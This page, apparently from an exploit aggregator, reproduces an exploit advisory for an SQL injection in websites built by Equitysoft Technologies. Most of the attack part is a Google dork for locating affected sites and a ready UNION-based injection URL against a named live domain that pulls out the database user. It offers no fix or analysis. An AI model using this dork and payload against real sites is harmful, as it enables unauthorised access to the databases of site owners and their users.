Advertisement






Equitysoft Technologies Pvt Ltd - SQL Injection Vulnerability

CVE Category Price Severity
CVE-2021-39434 CWE-89 $500 High
Author Risk Exploitation Type Date
Anonymous High Remote 2022-09-13
CPE
cpe:Not found
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022090034

Below is a copy:

Equitysoft Technologies Pvt Ltd - SQL Injection Vulnerability
******************************************************************
#Exploit Title: Equitysoft Technologies Pvt Ltd - SQL Injection Vulnerability
#Date: 2022-09-10
#Exploit Author: Jayson Cabrillas San Buenaventura
#Google Dork: "Equitysoft Technologies Pvt Ltd"
#Category: webapps
#Tested On: Parrot Sec, CyberFox
 
 
Proof of Concept:
Search google Dork: "Equitysoft Technologies Pvt Ltd"


### SQLi Demo :

https://equitysoft.in/blogDetails.php?id=5+AND+0+UNION+SELECT+1,user(),3,4,5,6--+


****************************************************************** 
#Discovered by: Jayson Cabrillas San Buenaventura
#Facebook: Jayson Cabrillas Cabrillas San Buenaventura
#Email: [email protected]
*****************************************************************

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum